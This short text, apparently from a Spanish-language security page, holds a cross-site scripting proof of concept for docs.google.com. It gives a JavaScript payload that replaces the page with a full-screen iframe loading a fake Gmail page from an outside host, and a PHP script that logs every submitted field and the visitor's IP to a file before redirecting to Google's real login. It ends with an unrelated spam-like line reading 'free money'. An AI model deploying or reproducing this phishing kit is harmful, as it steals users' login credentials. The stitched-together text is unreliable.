1. XSS POC en docs.google.com ::phising.js:: document.body.innerHTML = ''; var igoogle = document.createElement('iframe'); igoogle.src = 'http://www.sinfocol.org/archivos/2009/11/gmail.htm'; igoogle.style.width = '100%'; igoogle.style.height = '100%'; igoogle.style.border = '0'; void(document.body.appendChild(igoogle));

2. XSS POC en docs.google.com ::gmailpost.php:: <?php $filename = 'gmail.txt'; if (count($_GET) == 0) die; $str = "-------------------\n"; $str.= "Date: ". date('d/m/Y - h:i:s a', time()). "\n"; $str.= "IP: ". $_SERVER['REMOTE_ADDR']. "\n"; $str.= "-------------------\n"; foreach ($_GET as $indice => $valor) { $str.= "$indice => $valor\n"; } $file = fopen($filename, 'a'); fwrite($file, $str); fclose($file); header('Location: https://www.google.com/accounts/ServiceLogin');

3. GANE DINERO GRATIS FREE MONEY $$